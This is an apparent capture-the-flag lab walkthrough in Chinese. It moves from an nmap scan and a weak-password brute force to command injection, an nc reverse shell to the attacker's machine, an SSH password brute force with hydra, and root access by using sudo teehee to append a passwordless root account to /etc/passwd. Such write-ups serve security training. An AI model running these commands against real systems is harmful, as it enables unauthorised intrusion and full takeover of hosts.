用nmap扫内网存活主机
nmap -sn 192.168.32.0/24
发现目标主机 192.168.32.139
扫描有哪些端口开放
nmap -sV -p- 192.168.32.139
进入web页面,发现是个登录页面,尝试弱口令,用burp抓包发送到intruder模块,根据返回长度不同发现 admin/happy
登录进去发现可以执行一些命令,burp抓包发到repeater模块,修改radio里面的值发现会被执行
使用nc反弹
kali里输 nc -lvnp 9001
burp里被执行的参数改成 nc 192.168.32.129 9001 -e /bin/sh
反弹成功
在/home里找到三个用户文件夹
charles jim sam
在jim用户的backup目录下找到了一个old-password文件
把文件内容复制成pass.txt,用hydra暴出ssh的密码
hydra -l jim -P pass.txt ssh://192.168.32.139
发现密码是jibril04
ssh连接
ssh jim@192.168.32.139 -p 22
登录进来后查看用户权限sudo -l
发现没有sudo的权限
在登录进来的时候提示有一封邮件在 Linux 系统中,邮件通常存储在 /var/mail 目录下.
进入该目录发现目录下有jim用户的一封邮件邮件中有charles的密码
登录charles用户查看权限
发现teehee不需要密码可以有root权限,用teehee可以在文件中追加内容
使用:echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su admin登录进发现是root权限
